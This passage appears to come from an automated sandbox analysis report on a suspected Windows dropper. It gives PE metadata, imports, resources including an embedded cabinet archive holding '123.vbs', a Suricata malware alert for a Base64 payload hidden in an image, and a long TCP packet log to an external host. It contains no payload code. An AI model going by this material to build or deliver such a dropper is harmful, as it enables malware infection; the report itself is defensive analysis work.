                                                        TLSH:66F39D1A63E420A6E4BA53B198F202935A31BCB15B7892FF13D4D57E5E336C0A532F17
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

                                                        File Icon

                                                        Icon Hash:3b6120282c4c5a1f

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x140008200
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x140000000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:10
                                                        OS Version Minor:0
                                                        File Version Major:10
                                                        File Version Minor:0
                                                        Subsystem Version Major:10
                                                        Subsystem Version Minor:0
                                                        Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                        Entrypoint Preview

                                                        Instruction
                                                        dec eax
                                                        sub esp, 28h
                                                        call 00007F47FCB3BB00h
                                                        dec eax
                                                        add esp, 28h
                                                        jmp 00007F47FCB3B3ABh
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        dec eax
                                                        mov dword ptr [esp+08h], ebx
                                                        dec eax
                                                        mov dword ptr [esp+10h], edi
                                                        inc ecx
                                                        push esi
                                                        dec eax
                                                        sub esp, 000000B0h
                                                        and dword ptr [esp+20h], 00000000h
                                                        dec eax
                                                        lea ecx, dword ptr [esp+40h]
                                                        call dword ptr [000011CDh]
                                                        nop
                                                        dec eax
                                                        mov eax, dword ptr [00000030h]
                                                        dec eax
                                                        mov ebx, dword ptr [eax+08h]
                                                        xor edi, edi
                                                        xor eax, eax
                                                        dec eax
                                                        cmpxchg dword ptr [00004922h], ebx
                                                        je 00007F47FCB3B3ACh
                                                        dec eax
                                                        cmp eax, ebx
                                                        jne 00007F47FCB3B3BCh
                                                        mov edi, 00000001h
                                                        mov eax, dword ptr [00004918h]
                                                        cmp eax, 01h
                                                        jne 00007F47FCB3B3B9h
                                                        lea ecx, dword ptr [eax+1Eh]
                                                        call 00007F47FCB3B993h
                                                        jmp 00007F47FCB3B41Ch
                                                        mov ecx, 000003E8h
                                                        call dword ptr [0000117Eh]
                                                        jmp 00007F47FCB3B369h
                                                        mov eax, dword ptr [000048F6h]
                                                        test eax, eax
                                                        jne 00007F47FCB3B3FBh
                                                        mov dword ptr [000048E8h], 00000001h
                                                        dec esp
                                                        lea esi, dword ptr [000013E9h]
                                                        dec eax
                                                        lea ebx, dword ptr [000013CAh]
                                                        dec eax
                                                        mov dword ptr [esp+30h], ebx
                                                        mov dword ptr [esp+24h], eax
                                                        dec ecx
                                                        cmp ebx, esi
                                                        jnc 00007F47FCB3B3C7h
                                                        test eax, eax
                                                        jne 00007F47FCB3B3C7h
                                                        dec eax
                                                        cmp dword ptr [ebx], 00000000h
                                                        je 00007F47FCB3B3B2h
                                                        dec eax
                                                        mov eax, dword ptr [ebx]
                                                        dec eax
                                                        mov ecx, dword ptr [00001388h]

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1d0d8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d0000x20.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc0xf0000x1e0000x1d2008fddb618be6eb207c405389086f4955aFalse0.740930123390558data7.057952943108121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x2d0000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                        RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                        RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                        RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                        RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                        RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                        RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                        RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                        RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                        RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                        RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                        RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                        RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                        RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                        RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
                                                        RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
                                                        RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
                                                        RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
                                                        RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
                                                        RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
                                                        RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                        RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
                                                        RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
                                                        RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
                                                        RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
                                                        RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
                                                        RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                        RT_RCDATA0x298700x1b40Microsoft Cabinet archive data, Windows 2000/XP setup, 6976 bytes, 1 file, at 0x2c +A "123.vbs", ID 527, number 1, 1 datablock, 0x1503 compressionEnglishUnited States1.0015768348623852
                                                        RT_RCDATA0x2b3b00x4dataEnglishUnited States3.0
                                                        RT_RCDATA0x2b3b40x24GLS_BINARY_LSB_FIRSTEnglishUnited States0.6388888888888888
                                                        RT_RCDATA0x2b3d80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                        RT_RCDATA0x2b3e00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                        RT_RCDATA0x2b3e80x4dataEnglishUnited States3.0
                                                        RT_RCDATA0x2b3ec0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                        RT_RCDATA0x2b3f40x4dataEnglishUnited States3.0
                                                        RT_RCDATA0x2b3f80x13ASCII text, with no line terminatorsEnglishUnited States1.4210526315789473
                                                        RT_RCDATA0x2b40c0x4dataEnglishUnited States3.0
                                                        RT_RCDATA0x2b4100xcdataEnglishUnited States1.1666666666666667
                                                        RT_RCDATA0x2b41c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                        RT_RCDATA0x2b4240x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                        RT_GROUP_ICON0x2b42c0xbcdataEnglishUnited States0.6117021276595744
                                                        RT_VERSION0x2b4e80x408dataEnglishUnited States0.42151162790697677
                                                        RT_MANIFEST0x2b8f00x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                                                        Imports

                                                        DLLImport
                                                        ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                        KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                        GDI32.dllGetDeviceCaps
                                                        USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                        msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                        COMCTL32.dll
                                                        Cabinet.dll
                                                        VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-10-07T09:33:18.848191+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1185.199.111.133443192.168.2.649725TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 7, 2024 09:33:16.313148975 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:16.313255072 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:16.313343048 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:16.321819067 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:16.321861982 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:16.782248020 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:16.782442093 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:16.784996986 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:16.785007954 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:16.785358906 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:16.830626011 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:16.840811968 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:16.887418985 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.011253119 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.011981010 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012027025 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012052059 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012084007 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.012111902 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012123108 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.012434959 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012568951 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012602091 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012617111 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.012634039 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012689114 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.012717962 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.012818098 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.013348103 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.026810884 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.028449059 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.028458118 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.080650091 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.100239992 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.100332975 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.100415945 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.100420952 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.100430012 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.100483894 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.100496054 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.100532055 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.100596905 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.100601912 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.101371050 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.101418972 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.101448059 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.101499081 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.101504087 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.101511002 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.101551056 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.102165937 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.102230072 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.102262974 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.102274895 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.102281094 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.103075027 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.103105068 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.103120089 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.103126049 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.103149891 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.103156090 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.103974104 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.104013920 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.104038000 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.104047060 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.104053974 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.104080915 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.104110003 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.187921047 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.187937021 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.187971115 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.188005924 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.188033104 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.188062906 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.188083887 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.189074993 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.189097881 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.189133883 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.189141989 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.189169884 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.189321995 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.190876007 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.190896988 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.190934896 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.190939903 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.190972090 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.191201925 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.246108055 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.246134043 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.246202946 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.246217012 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.246239901 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.248420000 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.274874926 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.274904013 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.274955988 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.274980068 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.274990082 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.275038004 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.275532007 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.275552988 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.275603056 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.275608063 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.275643110 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.275656939 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.276441097 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.276472092 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.276504040 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.276509047 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.276545048 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.276573896 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.277367115 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.277396917 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.277431965 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.277436972 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.277482986 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.278234959 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.278254986 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.278318882 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.278330088 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.278645992 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.279246092 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.279268026 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.279333115 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.279339075 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.279372931 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.279392958 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.280009031 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.280029058 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.280100107 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.280106068 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.280162096 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.361402035 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.361427069 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.361501932 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.361521959 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.361596107 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.361886024 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.361910105 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.361948013 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.361953020 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.361978054 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.361999035 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.362381935 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.362402916 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.362469912 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.362477064 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.362556934 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.362951994 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.362989902 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.363034964 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.363039970 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.363066912 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.363106012 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.363883018 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.363907099 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.363966942 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.363974094 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.364022970 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.364303112 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.364320040 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.364381075 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.364387035 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.364439964 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.364768982 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.364790916 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.364836931 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.364846945 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.364867926 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.364896059 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.365192890 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.365209103 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.365283012 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.365288973 CEST44349725185.199.111.133192.168.2.6
                                                        Oct 7, 2024 09:33:17.365406990 CEST49725443192.168.2.6185.199.111.133
                                                        Oct 7, 2024 09:33:17.448767900 CEST44349725185.199.111.133192.168.2.6
